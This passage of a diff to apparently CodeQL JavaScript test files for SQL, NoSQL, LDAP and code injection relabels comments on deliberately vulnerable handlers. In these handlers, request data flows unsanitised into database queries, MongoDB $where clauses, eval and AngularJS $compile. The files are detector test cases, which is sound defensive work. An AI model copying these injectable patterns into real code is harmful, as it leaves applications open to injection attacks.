app.get('/event/:id/', async function(req, res) { const id = req.params.id; - const result = await kit2.graphql(`foo ${id}`); // NOT OK + const result = await kit2.graphql(`foo ${id}`); // $ Alert - const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // NOT OK + const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { graphql as nativeGraphql, buildSchema } from 'graphql'; @@ -72,7 +71,7 @@ var root = { app.get('/thing/:id', async function(req, res) { const id = req.query.id; - const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // NOT OK + const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert fetch("https://my-grpahql-server.com/graphql", { method: "POST", @@ -80,8 +79,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // NOT OK - query: `{ + query: `{ // $ Alert thing { name url @@ -97,7 +95,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // OK + query: `{ thing { name @@ -117,5 +115,5 @@ app.get('/event/:id/', async function(req, res) { const kit = github.getOctokit("foo") const id = req.params.id; - const result = await kit.graphql(`foo ${id}`); // NOT OK + const result = await kit.graphql(`foo ${id}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js index 50f0293c37fa..ade09ab6104e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js @@ -13,6 +13,6 @@ const connection = mysql.createConnection({ app.use(route.get('/test1', (context, param1) => { param1 = xss(param1) connection.query( - `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // NOT OK + `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert ); })); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js index a3bfcfd4a30d..121044ae5a14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js @@ -24,15 +24,15 @@ app.post('/documents/find', (req, res) => { const query = JSON.parse(req.query.data); if (checkSchema(query)) { - doc.find(query); // OK + doc.find(query); } if (ajv.validate(schema, query)) { - doc.find(query); // OK + doc.find(query); } if (validate(query)) { - doc.find(query); // NOT OK - validate() doesn't sanitize + doc.find(query); // $ Alert - validate() doesn't sanitize } - doc.find(query); // NOT OK + doc.find(query); // $ Alert }); }); @@ -50,15 +50,15 @@ app.post('/documents/insert', (req, res) => { const query = JSON.parse(req.query.data); const validate = joiSchema.validate(query); if (!validate.error) { - doc.find(query); // OK + doc.find(query); } else { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } try { await joiSchema.validateAsync(query); - doc.find(query); // OK - but still flagged [INCONSISTENCY] + doc.find(query); // $ SPURIOUS: Alert } catch (e) { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js index bc21bb58f4a8..e07fa929063c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js @@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => { conditions.push(`version = ${version}`) } - new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // OK + new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); }); function validVersion(version) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js index 9502cace21a8..c3a3eb840aef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js @@ -25,18 +25,18 @@ const server = http.createServer((req, res) => { filter: `(|(name=${username})(username=${username}))`, }; - client.search("o=example", opts1, function (err, res) {}); // NOT OK + client.search("o=example", opts1, function (err, res) {}); // $ Alert client.search( "o=example", - { filter: `(|(name=${username})(username=${username}))` }, // NOT OK + { filter: `(|(name=${username})(username=${username}))` }, // $ Alert function (err, res) {} ); - // GOOD + client.search( "o=example", - { // OK + { filter: `(|(name=${sanitizeInput(username)})(username=${sanitizeInput( username )}))`, @@ -44,7 +44,7 @@ const server = http.createServer((req, res) => { function (err, res) {} ); - // GOOD (https://github.com/ldapjs/node-ldapjs/issues/181) + // OK - https://github.com/ldapjs/node-ldapjs/issues/181 let f = new OrFilter({ filters: [ new EqualityFilter({ @@ -63,9 +63,9 @@ const server = http.createServer((req, res) => { const parsedFilter = ldap.parseFilter( `(|(name=${username})(username=${username}))` ); - client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // NOT OK + client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // $ Alert - const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // NOT OK + const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // $ Alert }); server.listen(389, () => {}); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js index 9b6d9b2fb88a..a1fd044b84aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js @@ -10,6 +10,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - db.myDoc.find(query, (err, data) => {}); + db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js index 0ebbb3d8a71a..31eea4ddef3a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js @@ -12,6 +12,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query, (err, data) => {}); + doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js index c2fe712e848c..a04855a27957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js @@ -14,6 +14,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js index fc786da87ab0..c557845f7525 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js @@ -14,22 +14,20 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value - // OK: user-data is coerced to a string + // OK - user-data is coerced to a string doc.find({ title: '' + query.body.title }); - // OK: throws unless user-data is a string + // OK - throws unless user-data is a string doc.find({ title: query.body.title.substr(1) }); let title = req.body.title; if (typeof title === "string") { - // OK: input checked to be a string + // OK - input checked to be a string doc.find({ title: title }); - // NOT OK: input is parsed as JSON after string check - doc.find({ title: JSON.parse(title) }); + doc.find({ title: JSON.parse(title) }); // $ Alert - input is parsed as JSON after string check } }); }); @@ -39,7 +37,7 @@ app.get('/:id', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); }); @@ -50,8 +48,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); @@ -61,8 +58,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, client) => { let doc = client.db("MASTER").collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); @@ -73,16 +69,14 @@ app.post("/logs/count-by-tag", (req, res) => { client .db(process.env.DB_NAME) .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); let importedDbo = require("./dbo.js"); importedDbo .db() .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); @@ -94,7 +88,7 @@ function useParams(params) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); } @@ -108,7 +102,6 @@ function useQuery(queries) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js index 61a87bfaa5ad..1aeb6f50c04a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js @@ -14,7 +14,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: req.body is safe + // OK - req.body is safe doc.find(query); }); }); @@ -25,7 +25,6 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: regardless of body parser, query value is still tainted - doc.find(query); + doc.find(query); // $ Alert - regardless of body parser, query value is still tainted }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js index 3092a60b2cd2..d379534cd9bd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js @@ -20,83 +20,69 @@ app.post('/documents/find', (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - Document.aggregate([query]); + Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.count(query); + Document.count(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteMany(query); + Document.deleteMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteOne(query); + Document.deleteOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.distinct('type', query); + Document.distinct('type', query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOne(query); + Document.findOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndDelete(query); + Document.findOneAndDelete(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndRemove(query); + Document.findOneAndRemove(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndUpdate(query); + Document.findOneAndUpdate(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.replaceOne(query); + Document.replaceOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.update(query); + Document.update(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateMany(query); + Document.updateMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateOne(query).then(X); + Document.updateOne(query).then(X); // $ Alert - query is tainted by user-provided object value - Document.findByIdAndUpdate(X, query, function(){}); // NOT OK + Document.findByIdAndUpdate(X, query, function(){}); // $ Alert - new Mongoose.Query(X, Y, query) // NOT OK - .and(query, function(){}) // NOT OK + new Mongoose.Query(X, Y, query) // $ Alert + .and(query, function(){}) // $ Alert ; - Document.where(query) // NOT OK - `.where()` on a Model. - .where(query) // NOT OK - `.where()` on a Query. - .and(query) // NOT OK - .or(query) // NOT OK - .distinct(X, query) // NOT OK - .comment(query) // OK - .count(query) // NOT OK + Document.where(query) // $ Alert - `.where()` on a Model. + .where(query) // $ Alert - `.where()` on a Query. + .and(query) // $ Alert + .or(query) // $ Alert + .distinct(X, query) // $ Alert + .comment(query) + .count(query) // $ Alert .exec() ; - Mongoose.createConnection(X).count(query); // OK (invalid program) - Mongoose.createConnection(X).model(Y).count(query); // NOT OK - Mongoose.createConnection(X).models[Y].count(query); // NOT OK - - Document.findOne(X, (err, res) => res.count(query)); // NOT OK - Document.findOne(X, (err, res) => err.count(query)); // OK - Document.findOne(X).exec((err, res) => res.count(query)); // NOT OK - Document.findOne(X).exec((err, res) => err.count(query)); // OK - Document.findOne(X).then((res) => res.count(query)); // NOT OK - Document.findOne(X).then(Y, (err) => err.count(query)); // OK - - Document.find(X, (err, res) => res[i].count(query)); // NOT OK - Document.find(X, (err, res) => err.count(query)); // OK - Document.find(X).exec((err, res) => res[i].count(query)); // NOT OK - Document.find(X).exec((err, res) => err.count(query)); // OK - Document.find(X).then((res) => res[i].count(query)); // NOT OK - Document.find(X).then(Y, (err) => err.count(query)); // OK - - Document.count(X, (err, res) => res.count(query)); // OK (res is a number) + Mongoose.createConnection(X).count(query); // OK - invalid program + Mongoose.createConnection(X).model(Y).count(query); // $ Alert + Mongoose.createConnection(X).models[Y].count(query); // $ Alert + + Document.findOne(X, (err, res) => res.count(query)); // $ Alert + Document.findOne(X, (err, res) => err.count(query)); + Document.findOne(X).exec((err, res) => res.count(query)); // $ Alert + Document.findOne(X).exec((err, res) => err.count(query)); + Document.findOne(X).then((res) => res.count(query)); // $ Alert + Document.findOne(X).then(Y, (err) => err.count(query)); + + Document.find(X, (err, res) => res[i].count(query)); // $ Alert + Document.find(X, (err, res) => err.count(query)); + Document.find(X).exec((err, res) => res[i].count(query)); // $ Alert + Document.find(X).exec((err, res) => err.count(query)); + Document.find(X).then((res) => res[i].count(query)); // $ Alert + Document.find(X).then(Y, (err) => err.count(query)); + + Document.count(X, (err, res) => res.count(query)); // OK - res is a number function innocent(X, Y, query) { // To detect if API-graphs were used incorrectly. return new Mongoose.Query("constant", "constant", "constant"); @@ -108,31 +94,31 @@ app.post('/documents/find', (req, res) => { } var C = getQueryConstructor(); - new C(X, Y, query); // NOT OK + new C(X, Y, query); // $ Alert - Document.findOneAndUpdate(X, query, function () { }); // NOT OK + Document.findOneAndUpdate(X, query, function () { }); // $ Alert let id = req.query.id, cond = req.query.cond; - Document.deleteMany(cond); // NOT OK - Document.deleteOne(cond); // NOT OK - Document.geoSearch(cond); // NOT OK - Document.remove(cond); // NOT OK - Document.replaceOne(cond, Y); // NOT OK - Document.find(cond); // NOT OK - Document.findOne(cond); // NOT OK - Document.findById(id); // NOT OK - Document.findOneAndDelete(cond); // NOT OK - Document.findOneAndRemove(cond); // NOT OK - Document.findOneAndUpdate(cond, Y); // NOT OK - Document.update(cond, Y); // NOT OK - Document.updateMany(cond, Y); // NOT OK - Document.updateOne(cond, Y); // NOT OK - Document.find({ _id: id }); // NOT OK - Document.find({ _id: { $eq: id } }); // OK + Document.deleteMany(cond); // $ Alert + Document.deleteOne(cond); // $ Alert + Document.geoSearch(cond); // $ Alert + Document.remove(cond); // $ Alert + Document.replaceOne(cond, Y); // $ Alert + Document.find(cond); // $ Alert + Document.findOne(cond); // $ Alert + Document.findById(id); // $ Alert + Document.findOneAndDelete(cond); // $ Alert + Document.findOneAndRemove(cond); // $ Alert + Document.findOneAndUpdate(cond, Y); // $ Alert + Document.update(cond, Y); // $ Alert + Document.updateMany(cond, Y); // $ Alert + Document.updateOne(cond, Y); // $ Alert + Document.find({ _id: id }); // $ Alert + Document.find({ _id: { $eq: id } }); if (Mongoose.Types.ObjectId.isValid(query)) { Document.findByIdAndUpdate(query, X, function(){}); // OK - is sanitized } else { - Document.findByIdAndUpdate(query, X, function(){}); // NOT OK + Document.findByIdAndUpdate(query, X, function(){}); // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js index a340bf2d968b..ea469f73ea3b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js @@ -19,7 +19,6 @@ app.get('/documents/find', (req, res) => { const query = {}; query.title = JSON.parse(req.query.data).title; - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js index f26ab52e7078..24aa90a9f735 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js @@ -8,7 +8,7 @@ app.use(bodyParser.json()); app.post('/find', (req, res) => { let v = JSON.parse(req.body.x); - MyModel.find({ id: v }); // NOT OK - MyModel.find({ id: req.body.id }); // NOT OK - MyModel.find({ id: `${req.body.id}` }); // OK + MyModel.find({ id: v }); // $ Alert + MyModel.find({ id: req.body.id }); // $ Alert + MyModel.find({ id: `${req.body.id}` }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js index de328fb49fae..29c21a4f3b49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js @@ -6,17 +6,17 @@ app.get("search", function handler(req, res) { let temp = req.params.value; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ?', // OK + sql: 'SELECT * FROM `books` WHERE `author` = ?', values: [temp] }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { - connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert function(error, results, fields) {}); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts index eaf46ad8cf85..03ad4e789653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts @@ -5,7 +5,7 @@ export class Foo { onRequest(req, res) { let taint = req.params.x; - this.db.one(taint); // NOT OK + this.db.one(taint); // $ Alert res.end(); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index d3f190dd1980..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -6,61 +6,61 @@ require('express')().get('/foo', (req, res) => { var query = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - db.any(query); // NOT OK - db.many(query); // NOT OK - db.manyOrNone(query); // NOT OK - db.map(query); // NOT OK - db.multi(query); // NOT OK - db.multiResult(query); // NOT OK - db.none(query); // NOT OK - db.one(query); // NOT OK - db.oneOrNone(query); // NOT OK - db.query(query); // NOT OK - db.result(query); // NOT OK + db.any(query); // $ Alert + db.many(query); // $ Alert + db.manyOrNone(query); // $ Alert + db.map(query); // $ Alert + db.multi(query); // $ Alert + db.multiResult(query); // $ Alert + db.none(query); // $ Alert + db.one(query); // $ Alert + db.oneOrNone(query); // $ Alert + db.query(query); // $ Alert + db.result(query); // $ Alert db.one({ - text: query // NOT OK + text: query // $ Alert }); db.one({ - text: 'SELECT * FROM news where id = $1', // OK - values: req.params.id, // OK + text: 'SELECT * FROM news where id = $1', + values: req.params.id, }); db.one({ text: 'SELECT * FROM news where id = $1:raw', - values: req.params.id, // NOT OK - interpreted as raw parameter + values: req.params.id, // $ Alert - interpreted as raw parameter }); db.one({ text: 'SELECT * FROM news where id = $1^', - values: req.params.id, // NOT OK + values: req.params.id, // $ Alert }); db.one({ text: 'SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3', values: [ - req.params.id, // NOT OK - req.params.name, // NOT OK + req.params.id, // $ Alert + req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - not using raw interpolation } }); db.one({ text: "SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE \"%${title}:value%\"", values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - :value cannot break out of single quotes - title: req.params.title, // NOT OK - enclosed by wrong type of quote + title: req.params.title, // $ Alert - enclosed by wrong type of quote } }); db.task(t => { - return t.one(query); // NOT OK + return t.one(query); // $ Alert }); db.taskIf( - { cnd: t => t.one(query) }, // NOT OK - t => t.one(query) // NOT OK + { cnd: t => t.one(query) }, // $ Alert + t => t.one(query) // $ Alert ); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js index 44a628a3c9e8..f5ca83ef1bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js @@ -7,47 +7,47 @@ const app = Express(); app.use(require('body-parser').json()); app.post('/documents/find', (req, res) => { - client.set(req.body.key, "value"); // NOT OK + client.set(req.body.key, "value"); // $ Alert var key = req.body.key; if (typeof key === "string") { - client.set(key, "value"); // OK + client.set(key, "value"); client.set(["key", "value"]); } - client.set(key, "value"); // NOT OK - client.hmset("key", "field", "value", key, "value2"); // NOT OK + client.set(key, "value"); // $ Alert + client.hmset("key", "field", "value", key, "value2"); // $ Alert // chain commands client .multi() .set("constant", "value") - .set(key, "value") // NOT OK - .get(key) // OK + .set(key, "value") // $ Alert + .get(key) .exec(function (err, replies) { }); client.duplicate((err, newClient) => { - newClient.set(key, "value"); // NOT OK + newClient.set(key, "value"); // $ Alert }); - client.duplicate().set(key, "value"); // NOT OK + client.duplicate().set(key, "value"); // $ Alert }); import { promisify } from 'util'; app.post('/documents/find', (req, res) => { const key = req.body.key; - client.set(key, "value"); // NOT OK + client.set(key, "value"); // $ Alert const setAsync = promisify(client.set).bind(client); - const foo1 = setAsync(key, "value"); // NOT OK + const foo1 = setAsync(key, "value"); // $ Alert client.setAsync = promisify(client.set); - const foo2 = client.setAsync(key, "value"); // NOT OK + const foo2 = client.setAsync(key, "value"); // $ Alert client.unrelated = promisify(() => {}); - const foo3 = client.unrelated(key, "value"); // OK + const foo3 = client.unrelated(key, "value"); const unrelated = promisify(client.foobar).bind(client); - const foo4 = unrelated(key, "value"); // OK + const foo4 = unrelated(key, "value"); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js index b28ddabc9ca6..c68c7d295ca7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js @@ -3,8 +3,7 @@ const sql = require('mssql'); var app = express(); app.get('/post/:id', async function(req, res) { - // OK + sql.query`select * from mytable where id = ${req.params.id}`; - // NOT OK - new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); + new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js index 3f9aa21355d1..99c6869a5110 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js @@ -6,11 +6,11 @@ const pool = new pg.Pool(config); function handler(req, res) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - pool.query(query1, [], function(err, results) { // BAD: the category might have SQL special characters in it + pool.query(query1, [], function(err, results) { // $ Alert - the category might have SQL special characters in it // process results }); - // GOOD: use parameters + // OK - use parameters var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1" + " ORDER BY PRICE"; pool.query(query2, [req.params.category], function(err, results) { diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js index 6facf5ec75a5..0aeb77af5a20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js @@ -14,12 +14,12 @@ app.post("/documents/find", (req, res) => { MongoClient.connect("mongodb://localhost:27017/test", (err, db) => { let doc = db.collection("doc"); - doc.find(query); // NOT OK, but that is flagged by js/sql-injection [INCONSISTENCY] - doc.find({ $where: req.body.query }); // NOT OK - doc.find({ $where: "name = " + req.body.name }); // NOT OK + doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection + doc.find({ $where: req.body.query }); // $ Alert[js/code-injection] + doc.find({ $where: "name = " + req.body.name }); // $ Alert[js/code-injection] function mkWhereObj() { - return { $where: "name = " + req.body.name }; // NOT OK + return { $where: "name = " + req.body.name }; // $ Alert[js/code-injection] } doc.find(mkWhereObj()); // the alert location is in mkWhereObj. diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js index df5cd88971a3..62158678073c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js @@ -1,5 +1,5 @@ const github = require('@actions/github'); function test() { - eval(github.context.payload.commits[1].message); // NOT OK + eval(github.context.payload.commits[1].message); // $ Alert[js/code-injection] } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js index 658d71e4c879..fb28264b5cec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js @@ -1,66 +1,66 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on(location.search); // OK + $scope.$on(location.search); }) .controller('MyController', function($scope) { - $scope.$apply('hello'); // OK + $scope.$apply('hello'); }) .controller('MyController', function($scope) { var scope = $scope; - scope.$apply(location.search); // BAD + scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$apply(location.search); // BAD + $scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$applyAsync(location.search); // BAD + $scope.$applyAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$eval(location.search); // BAD + $scope.$eval(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$evalAsync(location.search); // BAD + $scope.$evalAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watch(location.search); // BAD + $scope.$watch(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchCollection(location.search); // BAD + $scope.$watchCollection(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchGroup(location.search); // BAD + $scope.$watchGroup(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile('hello'); // 